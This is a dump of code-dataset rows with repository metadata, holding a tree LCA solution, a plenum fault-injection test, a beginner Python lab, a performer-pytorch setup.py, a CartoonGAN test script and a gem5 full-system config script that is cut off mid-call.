hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a84ca1ff74d6ac1f9694eabe007799d5010cba3 | 3,728 | py | Python | src/data/1220.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | src/data/1220.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | src/data/1220.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | #!/usr/bin python3
# -*- coding: utf-8 -*-
class Tree():
    """Rooted tree supporting an Euler tour, used here for LCA queries.

    Vertices are 0-indexed. Build the graph with add_edge(), then call
    set_euler_tour(root) exactly once to populate the tour arrays.
    """
    def __init__(self, n):
        # n: number of vertices
        self.n = n
        self.edges = [[] for _ in range(n)]  # adjacency lists (undirected)
        self.root = None  # root vertex, set by set_euler_tour()
        self.etnodes = []  # vertex visited at step i of the Euler tour
        self.etedges = []  # tour events: v when entering vertex v, ~v when leaving
        self.etL = [0] * n  # etL[v]: tour step at which v is first entered ("in" time)
        self.etR = [0] * n  # etR[v]: tour step at which v is left ("out" time)
        self.depthbynodes = [0] * n  # depth of each vertex measured from the root
        self.etdepth = []  # depth recorded at step i of the tour (RMQ input for LCA)
    def add_edge(self, u, v):
        # Register an undirected edge between u and v.
        self.edges[u].append(v)
        self.edges[v].append(u)
    def set_euler_tour(self, root):
        # Iterative DFS producing the Euler tour. The stack holds v ("enter
        # vertex v") and ~v ("leave vertex v"); ~v < 0 distinguishes the two.
        self.root = root  # remember the chosen root
        pa = [0] * self.n  # parent of each vertex (root's parent stays 0)
        stack = [~root, root]
        ct = -1  # tour step counter
        de = -1  # current depth; becomes 0 when the root is entered
        while stack:
            v = stack.pop()
            ct += 1
            self.etedges.append(v)
            if v >= 0:
                # Entering vertex v.
                de += 1
                self.etnodes.append(v)
                self.etdepth.append(de)
                self.etL[v] = ct
                self.depthbynodes[v] = de
                p = pa[v]
                # Push children in reverse so they are visited in input order.
                for w in self.edges[v][::-1]:
                    if w == p: continue
                    pa[w] = v
                    stack.append(~w)
                    stack.append(w)
            else:
                # Leaving vertex ~v.
                de -= 1
                if de < 0:
                    # Final step (leaving the root): record the sentinel depth
                    # n so this step never wins a range-minimum query.
                    self.etdepth.append(self.n)
                else:
                    self.etdepth.append(de)
                self.etnodes.append(pa[~v])
                self.etR[~v] = ct
#############################################
class SegmentTree:
    """Segment tree over (value, index) pairs, supporting point updates and
    range folds — with the default monoid, range-minimum with argmin.

    Parameters
    ----------
    size : int
        Number of elements; internally rounded up to a power of two so the
        tree is a perfect binary tree.
    f : callable, optional
        Associative monoid operation applied to (value, index) pairs
        (default: min, i.e. range minimum with index as tie-breaker).
    idele : optional
        Identity element of f for the value slot (default: +inf).
    """
    def __init__(self, size, f=lambda x, y: min(x, y), idele=float('inf')):
        self.size = 2**(size - 1).bit_length()  # round element count up to a power of two
        self.idele = idele  # identity element
        self.f = f  # monoid operation
        # dat[1] is the root; dat[size .. 2*size-1] are the leaves.
        # Index -1 marks "no element" in identity pairs.
        self.dat = [(self.idele, -1)] * (self.size * 2)
    ## one point
    def update(self, i, x):
        """Set element i to value x, then repair all ancestors.

        Bug fix: the original stored the shifted leaf position (i + size)
        as the index component, which was inconsistent with init() and made
        query(...)[1] unusable after an update. We store the ORIGINAL index.
        """
        pos = i + self.size  # position of the leaf in the flat array
        self.dat[pos] = (x, i)  # keep the original index, matching init()
        while pos > 1:  # climb to the root at dat[1]; dat[0] is unused
            pos >>= 1  # parent in the implicit complete binary tree
            # Recombine the two children (sibling fold at each level).
            self.dat[pos] = self.f(self.dat[pos * 2], self.dat[pos * 2 + 1])
    ## range
    def query(self, l, r):
        """Fold f over the half-open range [l, r); returns a (value, index) pair."""
        l += self.size  # leaf position of l
        r += self.size  # leaf position of r
        lres, rres = (self.idele, -1), (self.idele, -1)  # left- and right-side accumulators
        while l < r:  # walk up until the boundaries meet
            # If l is a right child (odd), dat[l] lies inside the range: take it.
            if l & 1:
                lres = self.f(lres, self.dat[l])
                l += 1
            # If r is odd, dat[r-1] lies inside the range: take it.
            if r & 1:
                r -= 1
                # A general monoid need not be commutative, so keep the
                # left-to-right operand order.
                rres = self.f(self.dat[r], rres)
            l >>= 1
            r >>= 1
        res = self.f(lres, rres)
        return res
    def init(self, a):
        """Bulk-load values from iterable a in O(n), storing (value, index) leaves."""
        for i, x in enumerate(a):
            # leaf position of element i
            self.dat[i + self.size] = (x, i)
        # Build internal nodes bottom-up; stop at 1 (dat[0] is never read).
        for i in range(self.size - 1, 0, -1):
            self.dat[i] = self.f(self.dat[i * 2], self.dat[i * 2 + 1])
############################################
# Driver: answer LCA-distance parity queries.
# Input: "n q", then n-1 edges (1-indexed), then q vertex pairs (a, b).
# For each pair, the LCA is found via a range-minimum query over the
# Euler-tour depths; the path length d decides whether the midpoint of the
# a-b path is a vertex ('Town', even d) or the middle of an edge ('Road').
n, q = map(int, input().split())
T = Tree(n)
for _ in range(n - 1):
    a, b = map(int, input().split())
    T.add_edge(a - 1, b - 1)  # convert to 0-indexed vertices
T.set_euler_tour(0)  # root the tree at vertex 0
depth = T.etdepth
SGT = SegmentTree(len(depth))
SGT.init(depth)
for i in range(q):
    a, b = map(int, input().split())
    a -= 1
    b -= 1
    l = T.etL[a]  # first-visit times of a and b in the Euler tour
    r = T.etL[b]
    if l > r:
        l, r = r, l
    r += 1  # half-open range for the segment tree query
    x = SGT.query(l, r)[1]  # tour position of the minimum depth in [l, r)
    lca = T.etnodes[x]  # the vertex at that position is the LCA of a and b
    # Distance between a and b through their LCA.
    d = T.depthbynodes[a] + T.depthbynodes[b] - 2 * T.depthbynodes[lca]
    if d % 2 == 0:
        print('Town')
    else:
        print('Road')
| 28.242424 | 75 | 0.441792 |
3f37e86b6e246dcfd4af33dc291c99d749027858 | 705 | py | Python | plenum/test/node_request/test_pre_prepare/test_num_of_pre_prepare_with_one_fault.py | steptan/indy-plenum | 488bf63c82753a74a92ac6952da784825ffd4a3d | [
"Apache-2.0"
] | null | null | null | plenum/test/node_request/test_pre_prepare/test_num_of_pre_prepare_with_one_fault.py | steptan/indy-plenum | 488bf63c82753a74a92ac6952da784825ffd4a3d | [
"Apache-2.0"
] | null | null | null | plenum/test/node_request/test_pre_prepare/test_num_of_pre_prepare_with_one_fault.py | steptan/indy-plenum | 488bf63c82753a74a92ac6952da784825ffd4a3d | [
"Apache-2.0"
] | 2 | 2017-12-13T21:14:54.000Z | 2021-06-06T15:48:03.000Z | from functools import partial
import pytest
from stp_core.common.util import adict
from plenum.test.malicious_behaviors_node import makeNodeFaulty, \
delaysPrePrepareProcessing
# Test configuration: a 4-node pool with a single faulty node.
nodeCount = 4
faultyNodes = 1
# Log messages that are expected during this scenario and must not fail the run.
whitelist = ['cannot process incoming PREPARE']
@pytest.fixture(scope="module")
def setup(txnPoolNodeSet):
    """Make the last pool node faulty by delaying its PRE-PREPARE processing
    by 60 seconds, and expose it to dependent fixtures."""
    A = txnPoolNodeSet[-1]
    makeNodeFaulty(A,
                   partial(delaysPrePrepareProcessing, delay=60))
    # A.delaySelfNomination(10)
    return adict(faulties=A)
@pytest.fixture(scope="module")
def afterElection(setup):
    """After election completes, the faulty node must not hold any primary
    replica (otherwise the scenario would not exercise the intended path)."""
    for r in setup.faulties.replicas:
        assert not r.isPrimary
def testNumOfPrePrepareWithOneFault(afterElection, preprepared1):
    # All assertions live in the fixtures (afterElection, preprepared1);
    # the test body is intentionally empty.
    pass
| 22.741935 | 66 | 0.747518 |
9663633d8e9dc1620e4de66cde0433a0b68a5cd5 | 1,261 | py | Python | Basic_Python_Programs/lab 3.py | Techme2911/HacktoberFest19-Algo | 1ca4007cc014b9d9131be92f362f4d2f846cdbc4 | [
"MIT"
] | 86 | 2015-06-13T16:53:55.000Z | 2022-03-24T20:56:42.000Z | Basic_Python_Programs/lab 3.py | Techme2911/HacktoberFest19-Algo | 1ca4007cc014b9d9131be92f362f4d2f846cdbc4 | [
"MIT"
] | 9 | 2015-05-27T07:52:44.000Z | 2022-03-29T21:52:40.000Z | Basic_Python_Programs/lab 3.py | Techme2911/HacktoberFest19-Algo | 1ca4007cc014b9d9131be92f362f4d2f846cdbc4 | [
"MIT"
] | 124 | 2015-12-10T01:17:18.000Z | 2021-11-08T04:03:38.000Z | # 1. WAP to create and merge two list and then sort it wihtout function sort
# 2. WAP to create list of number and sort even numbers using LIST COMPREHENSION
# 3. WAP to calculate number of uppercase and lowercase from input string.
# --- P1: merge two lists and sort the result by hand (selection sort) -------
l1 = []
l2 = []
a = int(input("Enter number of elements you want to enter in list 1: "))
b = int(input("Enter number of elements you want to enter in list 2: "))
for i in range(a):
    x = int(input("Enter List Element: "))
    l1.append(x)
for i in range(b):
    x = int(input("Enter List Element: "))
    l2.append(x)
l1.extend(l2)
m = []
for i in range(len(l1)):
    # Compute the minimum once per pass (the original called min() twice,
    # doubling the work of each selection-sort pass).
    smallest = min(l1)
    m.append(smallest)
    l1.remove(smallest)
m.extend(l1)  # l1 is empty at this point; kept for parity with the original flow
print(m, end=" ")
print("is your sorted list")
# --- P2: collect even numbers with a list comprehension ---------------------
l = []
a = int(input("Number of elements in the list: "))
for i in range(a):
    x = int(input("Enter List Element: "))
    l.append(x)
lee = [i for i in l if i % 2 == 0]
print("List of your even numbers is={evenlist}".format(evenlist=lee))
# --- P3: count upper- and lower-case characters -----------------------------
s = input("Enter any word string: ")
cu = 0
cl = 0
for i in s:
    if i.isupper():
        cu = cu + 1
    elif i.islower():
        # Fixed: the original's bare `else` also counted digits, spaces and
        # punctuation as lower-case, contrary to the stated problem.
        cl = cl + 1
print("Number of lower case:", cl)
print("Number of upper case:", cu)
| 21.741379 | 81 | 0.581285 |
b59ca589ddd8a93913244f35064d7b2cb72c65e1 | 847 | py | Python | setup.py | Erotemic/performer-pytorch | 968d3340a6a6d0cfd5bc208974bec85aa270e071 | [
"MIT"
] | 829 | 2020-10-03T15:38:41.000Z | 2022-03-28T15:22:16.000Z | setup.py | Erotemic/performer-pytorch | 968d3340a6a6d0cfd5bc208974bec85aa270e071 | [
"MIT"
] | 77 | 2020-10-05T18:55:14.000Z | 2022-03-28T00:16:29.000Z | setup.py | Erotemic/performer-pytorch | 968d3340a6a6d0cfd5bc208974bec85aa270e071 | [
"MIT"
] | 125 | 2020-10-11T11:11:18.000Z | 2022-03-29T11:14:24.000Z | from setuptools import setup, find_packages
# Package metadata for the PyPI distribution of performer-pytorch.
setup(
    name = 'performer-pytorch',
    packages = find_packages(exclude=['examples']),  # ship everything except the examples dir
    version = '1.1.0',
    license='MIT',
    description = 'Performer - Pytorch',
    author = 'Phil Wang',
    author_email = 'lucidrains@gmail.com',
    url = 'https://github.com/lucidrains/performer-pytorch',
    keywords = [
        'artificial intelligence',
        'attention mechanism',
        'efficient attention',
        'transformers'
    ],
    # Runtime dependencies with minimum versions.
    install_requires=[
        'einops>=0.3',
        'local-attention>=1.1.1',
        'torch>=1.6',
        'axial-positional-embedding>=0.1.0'
    ],
    # Trove classifiers (see https://pypi.org/classifiers/).
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Topic :: Scientific/Engineering :: Artificial Intelligence',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3.6',
    ],
)
| 26.46875 | 65 | 0.646989 |
40f9db98c9d8059a7452f93c8f695a22564f9018 | 2,558 | py | Python | test.py | manestay/CartoonGAN-4731 | f8580a7f027d6505ce0e5c15314e2b53fe18b69e | [
"MIT"
] | 4 | 2019-01-23T16:00:06.000Z | 2020-05-06T12:45:00.000Z | test.py | manestay/CartoonGAN-4731 | f8580a7f027d6505ce0e5c15314e2b53fe18b69e | [
"MIT"
] | null | null | null | test.py | manestay/CartoonGAN-4731 | f8580a7f027d6505ce0e5c15314e2b53fe18b69e | [
"MIT"
] | 1 | 2019-12-03T13:16:15.000Z | 2019-12-03T13:16:15.000Z | import os, time, pickle, argparse, networks, utils
import torch
import torch.nn as nn
import torch.optim as optim
import matplotlib.pyplot as plt
from torchvision import transforms
# Inference script: run a pre-trained CartoonGAN generator over a directory
# of test images and save input/output pairs side by side.
parser = argparse.ArgumentParser()
parser.add_argument('--name', required=False, default='project_name', help='')
parser.add_argument('--in_ngc', type=int, default=3, help='input channel for generator')
parser.add_argument('--out_ngc', type=int, default=3, help='output channel for generator')
parser.add_argument('--batch_size', type=int, default=8, help='batch size')
parser.add_argument('--ngf', type=int, default=64)
parser.add_argument('--nb', type=int, default=8, help='the number of resnet block layer for generator')
parser.add_argument('--input_size_h', type=int, default=180, help='input size height')
parser.add_argument('--input_size_w', type=int, default=320, help='input size width')
parser.add_argument('--pre_trained_model', required=True, default='pre_trained_model', help='pre_trained cartoongan model path')
parser.add_argument('--image_dir', required=True, default='image_dir', help='test image path')
parser.add_argument('--output_image_dir', required=True, default='output_image_dir', help='output test image path')
args = parser.parse_args()
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
if torch.backends.cudnn.enabled:
    torch.backends.cudnn.benchmark = True  # autotune convolutions for the fixed input size
# Build the generator and load the checkpoint; fall back to CPU weights
# loading when CUDA is unavailable.
G = networks.generator(args.in_ngc, args.out_ngc, args.ngf, args.nb)
if torch.cuda.is_available():
    G.load_state_dict(torch.load(args.pre_trained_model))
else:
    # cpu mode
    G.load_state_dict(torch.load(args.pre_trained_model, map_location=lambda storage, loc: storage))
G.to(device)
# Resize to the network input size and normalize each channel to [-1, 1].
src_transform = transforms.Compose([
    transforms.Resize((args.input_size_h, args.input_size_w)),
    transforms.ToTensor(),
    transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))
])
# utils.data_load(os.path.join('data', args.src_data), 'test', src_transform, 1, shuffle=True, drop_last=True)
image_src = utils.data_load(os.path.join(args.image_dir), 'test', src_transform, 1, shuffle=False, drop_last=True)
os.makedirs(args.output_image_dir, exist_ok=True)
with torch.no_grad():
    G.eval()
    num_digits = len(str(len(image_src)))  # zero-pad filenames so they sort correctly
    for n, (x, _) in enumerate(image_src):
        x = x.to(device)
        G_recon = G(x)
        # Concatenate input and reconstruction along width; map back from
        # [-1, 1] to [0, 1] before saving.
        result = torch.cat((x[0], G_recon[0]), 2)
        path = os.path.join(args.output_image_dir, str(n + 1).zfill(num_digits) + '.png')
        plt.imsave(path, (result.cpu().numpy().transpose(1, 2, 0) + 1) / 2)
0f87e2b3acb3ca950e04a77204cb3e0314b81867 | 16,483 | py | Python | configs/example/fs.py | MRGuenther/DynamicPrefetch | 02627350c08868ad3988fe89fc004f0bac1a4c14 | [
"BSD-3-Clause"
] | 1 | 2020-11-24T14:39:55.000Z | 2020-11-24T14:39:55.000Z | configs/example/fs.py | MRGuenther/DynamicPrefetch | 02627350c08868ad3988fe89fc004f0bac1a4c14 | [
"BSD-3-Clause"
] | null | null | null | configs/example/fs.py | MRGuenther/DynamicPrefetch | 02627350c08868ad3988fe89fc004f0bac1a4c14 | [
"BSD-3-Clause"
] | 1 | 2021-12-08T10:19:20.000Z | 2021-12-08T10:19:20.000Z | # Copyright (c) 2010-2013, 2016 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2012-2014 Mark D. Hill and David A. Wood
# Copyright (c) 2009-2011 Advanced Micro Devices, Inc.
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ali Saidi
# Brad Beckmann
from __future__ import print_function
import optparse
import sys
import m5
from m5.defines import buildEnv
from m5.objects import *
from m5.util import addToPath, fatal, warn
from m5.util.fdthelper import *
addToPath('../')
from ruby import Ruby
from common.FSConfig import *
from common.SysPaths import *
from common.Benchmarks import *
from common import Simulation
from common import CacheConfig
from common import MemConfig
from common import CpuConfig
from common.Caches import *
from common import Options
# Check if KVM support has been enabled, we might need to do VM
# configuration if that's the case.
have_kvm_support = 'BaseKvmCPU' in globals()
def is_kvm_cpu(cpu_class):
    """Return True iff cpu_class is a KVM-based CPU model.

    Guarded by have_kvm_support because BaseKvmCPU only exists when gem5
    was built with KVM support. Uses `is not None` per PEP 8 (the original
    compared with `!= None`).
    """
    return have_kvm_support and cpu_class is not None and \
        issubclass(cpu_class, BaseKvmCPU)
def cmd_line_template():
    """Return the kernel command line from the parsed options, or None.

    --command-line and --command-line-file are mutually exclusive; supplying
    both is a fatal usage error.
    """
    if options.command_line and options.command_line_file:
        print("Error: --command-line and --command-line-file are "
              "mutually exclusive")
        sys.exit(1)

    if options.command_line:
        return options.command_line

    if options.command_line_file:
        # Use a context manager so the file descriptor is closed promptly
        # (the original relied on garbage collection to close it).
        with open(options.command_line_file) as f:
            return f.read().strip()

    return None
def build_test_system(np):
    """Construct the full-system simulation target for `np` CPUs.

    Selects the ISA-specific system builder, sets up clock/voltage domains,
    instantiates the CPUs, and wires up either the Ruby memory system or the
    classic caches. Reads the module-level `options`, `bm`, `test_mem_mode`,
    `TestCPUClass` and `FutureClass`. Returns the configured test system.
    """
    cmdline = cmd_line_template()
    if buildEnv['TARGET_ISA'] == "alpha":
        test_sys = makeLinuxAlphaSystem(test_mem_mode, bm[0], options.ruby,
                                        cmdline=cmdline)
    elif buildEnv['TARGET_ISA'] == "mips":
        test_sys = makeLinuxMipsSystem(test_mem_mode, bm[0], cmdline=cmdline)
    elif buildEnv['TARGET_ISA'] == "sparc":
        test_sys = makeSparcSystem(test_mem_mode, bm[0], cmdline=cmdline)
    elif buildEnv['TARGET_ISA'] == "x86":
        test_sys = makeLinuxX86System(test_mem_mode, options.num_cpus, bm[0],
                                      options.ruby, cmdline=cmdline)
    elif buildEnv['TARGET_ISA'] == "arm":
        test_sys = makeArmSystem(test_mem_mode, options.machine_type,
                                 options.num_cpus, bm[0], options.dtb_filename,
                                 bare_metal=options.bare_metal,
                                 cmdline=cmdline,
                                 ignore_dtb=options.generate_dtb,
                                 external_memory=
                                 options.external_memory_system,
                                 ruby=options.ruby,
                                 security=options.enable_security_extensions)
        if options.enable_context_switch_stats_dump:
            test_sys.enable_context_switch_stats_dump = True
    else:
        fatal("Incapable of building %s full system!", buildEnv['TARGET_ISA'])
    # Set the cache line size for the entire system
    test_sys.cache_line_size = options.cacheline_size
    # Create a top-level voltage domain
    test_sys.voltage_domain = VoltageDomain(voltage = options.sys_voltage)
    # Create a source clock for the system and set the clock period
    test_sys.clk_domain = SrcClockDomain(clock = options.sys_clock,
                                         voltage_domain = test_sys.voltage_domain)
    # Create a CPU voltage domain
    test_sys.cpu_voltage_domain = VoltageDomain()
    # Create a source clock for the CPUs and set the clock period
    test_sys.cpu_clk_domain = SrcClockDomain(clock = options.cpu_clock,
                                             voltage_domain =
                                             test_sys.cpu_voltage_domain)
    if options.kernel is not None:
        test_sys.kernel = binary(options.kernel)
    if options.script is not None:
        test_sys.readfile = options.script
    if options.lpae:
        test_sys.have_lpae = True
    if options.virtualisation:
        test_sys.have_virtualization = True
    test_sys.init_param = options.init_param
    # For now, assign all the CPUs to the same clock domain
    test_sys.cpu = [TestCPUClass(clk_domain=test_sys.cpu_clk_domain, cpu_id=i)
                    for i in xrange(np)]
    if is_kvm_cpu(TestCPUClass) or is_kvm_cpu(FutureClass):
        test_sys.kvm_vm = KvmVM()
    if options.ruby:
        Ruby.create_system(options, True, test_sys, test_sys.iobus,
                           test_sys._dma_ports)
        # Create a seperate clock domain for Ruby
        test_sys.ruby.clk_domain = SrcClockDomain(clock = options.ruby_clock,
                                                  voltage_domain = test_sys.voltage_domain)
        # Connect the ruby io port to the PIO bus,
        # assuming that there is just one such port.
        test_sys.iobus.master = test_sys.ruby._io_port.slave
        for (i, cpu) in enumerate(test_sys.cpu):
            #
            # Tie the cpu ports to the correct ruby system ports
            #
            cpu.clk_domain = test_sys.cpu_clk_domain
            cpu.createThreads()
            cpu.createInterruptController()
            cpu.icache_port = test_sys.ruby._cpu_ports[i].slave
            cpu.dcache_port = test_sys.ruby._cpu_ports[i].slave
            # x86 and ARM page-table walkers also go through Ruby.
            if buildEnv['TARGET_ISA'] in ("x86", "arm"):
                cpu.itb.walker.port = test_sys.ruby._cpu_ports[i].slave
                cpu.dtb.walker.port = test_sys.ruby._cpu_ports[i].slave
            if buildEnv['TARGET_ISA'] in "x86":
                cpu.interrupts[0].pio = test_sys.ruby._cpu_ports[i].master
                cpu.interrupts[0].int_master = test_sys.ruby._cpu_ports[i].slave
                cpu.interrupts[0].int_slave = test_sys.ruby._cpu_ports[i].master
    else:
        # Classic memory system: I/O reaches memory via an IOCache when
        # caches are configured, otherwise via a plain bridge.
        if options.caches or options.l2cache:
            # By default the IOCache runs at the system clock
            test_sys.iocache = IOCache(addr_ranges = test_sys.mem_ranges)
            test_sys.iocache.cpu_side = test_sys.iobus.master
            test_sys.iocache.mem_side = test_sys.membus.slave
        elif not options.external_memory_system:
            test_sys.iobridge = Bridge(delay='50ns', ranges = test_sys.mem_ranges)
            test_sys.iobridge.slave = test_sys.iobus.master
            test_sys.iobridge.master = test_sys.membus.slave
        # Sanity check
        if options.fastmem:
            if TestCPUClass != AtomicSimpleCPU:
                fatal("Fastmem can only be used with atomic CPU!")
            if (options.caches or options.l2cache):
                fatal("You cannot use fastmem in combination with caches!")
        if options.simpoint_profile:
            if not options.fastmem:
                # Atomic CPU checked with fastmem option already
                fatal("SimPoint generation should be done with atomic cpu and fastmem")
            if np > 1:
                fatal("SimPoint generation not supported with more than one CPUs")
        for i in xrange(np):
            if options.fastmem:
                test_sys.cpu[i].fastmem = True
            if options.simpoint_profile:
                test_sys.cpu[i].addSimPointProbe(options.simpoint_interval)
            if options.checker:
                test_sys.cpu[i].addCheckerCpu()
            test_sys.cpu[i].createThreads()
    # If elastic tracing is enabled when not restoring from checkpoint and
    # when not fast forwarding using the atomic cpu, then check that the
    # TestCPUClass is DerivO3CPU or inherits from DerivO3CPU. If the check
    # passes then attach the elastic trace probe.
    # If restoring from checkpoint or fast forwarding, the code that does this for
    # FutureCPUClass is in the Simulation module. If the check passes then the
    # elastic trace probe is attached to the switch CPUs.
    if options.elastic_trace_en and options.checkpoint_restore == None and \
        not options.fast_forward:
        CpuConfig.config_etrace(TestCPUClass, test_sys.cpu, options)
    CacheConfig.config_cache(options, test_sys)
    MemConfig.config_mem(options, test_sys)
    return test_sys
def build_drive_system(np):
    """Construct the drive system of a dual-system setup.

    The driver only generates traffic for the test system, so it always
    uses a simple atomic CPU and SimpleMemory regardless of the options
    chosen for the system under test. Returns the configured drive system.
    """
    # driver system CPU is always simple, so is the memory
    # Note this is an assignment of a class, not an instance.
    DriveCPUClass = AtomicSimpleCPU
    drive_mem_mode = 'atomic'
    DriveMemClass = SimpleMemory
    cmdline = cmd_line_template()
    if buildEnv['TARGET_ISA'] == 'alpha':
        drive_sys = makeLinuxAlphaSystem(drive_mem_mode, bm[1], cmdline=cmdline)
    elif buildEnv['TARGET_ISA'] == 'mips':
        drive_sys = makeLinuxMipsSystem(drive_mem_mode, bm[1], cmdline=cmdline)
    elif buildEnv['TARGET_ISA'] == 'sparc':
        drive_sys = makeSparcSystem(drive_mem_mode, bm[1], cmdline=cmdline)
    elif buildEnv['TARGET_ISA'] == 'x86':
        drive_sys = makeLinuxX86System(drive_mem_mode, np, bm[1],
                                       cmdline=cmdline)
    elif buildEnv['TARGET_ISA'] == 'arm':
        drive_sys = makeArmSystem(drive_mem_mode, options.machine_type, np,
                                  bm[1], options.dtb_filename, cmdline=cmdline,
                                  ignore_dtb=options.generate_dtb)
    # Create a top-level voltage domain
    drive_sys.voltage_domain = VoltageDomain(voltage = options.sys_voltage)
    # Create a source clock for the system and set the clock period
    drive_sys.clk_domain = SrcClockDomain(clock = options.sys_clock,
                                          voltage_domain = drive_sys.voltage_domain)
    # Create a CPU voltage domain
    drive_sys.cpu_voltage_domain = VoltageDomain()
    # Create a source clock for the CPUs and set the clock period
    drive_sys.cpu_clk_domain = SrcClockDomain(clock = options.cpu_clock,
                                              voltage_domain =
                                              drive_sys.cpu_voltage_domain)
    drive_sys.cpu = DriveCPUClass(clk_domain=drive_sys.cpu_clk_domain,
                                  cpu_id=0)
    drive_sys.cpu.createThreads()
    drive_sys.cpu.createInterruptController()
    drive_sys.cpu.connectAllPorts(drive_sys.membus)
    if options.fastmem:
        drive_sys.cpu.fastmem = True
    if options.kernel is not None:
        drive_sys.kernel = binary(options.kernel)
    if is_kvm_cpu(DriveCPUClass):
        drive_sys.kvm_vm = KvmVM()
    # Bridge I/O traffic to the memory bus.
    drive_sys.iobridge = Bridge(delay='50ns',
                                ranges = drive_sys.mem_ranges)
    drive_sys.iobridge.slave = drive_sys.iobus.master
    drive_sys.iobridge.master = drive_sys.membus.slave
    # Create the appropriate memory controllers and connect them to the
    # memory bus
    drive_sys.mem_ctrls = [DriveMemClass(range = r)
                           for r in drive_sys.mem_ranges]
    for i in xrange(len(drive_sys.mem_ctrls)):
        drive_sys.mem_ctrls[i].port = drive_sys.membus.master
    drive_sys.init_param = options.init_param
    return drive_sys
# Add options
# Top-level driver: parse options, build the system(s), create the Root
# object, optionally generate a device tree (ARM), and run the simulation.
parser = optparse.OptionParser()
Options.addCommonOptions(parser)
Options.addFSOptions(parser)
# Add the ruby specific and protocol specific options
if '--ruby' in sys.argv:
    Ruby.define_options(parser)
(options, args) = parser.parse_args()
if args:
    print("Error: script doesn't take any positional arguments")
    sys.exit(1)
# system under test can be any CPU
(TestCPUClass, test_mem_mode, FutureClass) = Simulation.setCPUClass(options)
# Match the memories with the CPUs, based on the options for the test system
TestMemClass = Simulation.setMemClass(options)
if options.benchmark:
    try:
        bm = Benchmarks[options.benchmark]
    except KeyError:
        print("Error benchmark %s has not been defined." % options.benchmark)
        print("Valid benchmarks are: %s" % DefinedBenchmarks)
        sys.exit(1)
else:
    # No named benchmark: build SysConfig(s) from the disk/memory options.
    # --dual gets two identical configs (test + drive systems).
    if options.dual:
        bm = [SysConfig(disk=options.disk_image, rootdev=options.root_device,
                        mem=options.mem_size, os_type=options.os_type),
              SysConfig(disk=options.disk_image, rootdev=options.root_device,
                        mem=options.mem_size, os_type=options.os_type)]
    else:
        bm = [SysConfig(disk=options.disk_image, rootdev=options.root_device,
                        mem=options.mem_size, os_type=options.os_type)]
np = options.num_cpus
test_sys = build_test_system(np)
if len(bm) == 2:
    # Dual setup: a driven test system plus a driving system.
    drive_sys = build_drive_system(np)
    root = makeDualRoot(True, test_sys, drive_sys, options.etherdump)
elif len(bm) == 1 and options.dist:
    # This system is part of a dist-gem5 simulation
    root = makeDistRoot(test_sys,
                        options.dist_rank,
                        options.dist_size,
                        options.dist_server_name,
                        options.dist_server_port,
                        options.dist_sync_repeat,
                        options.dist_sync_start,
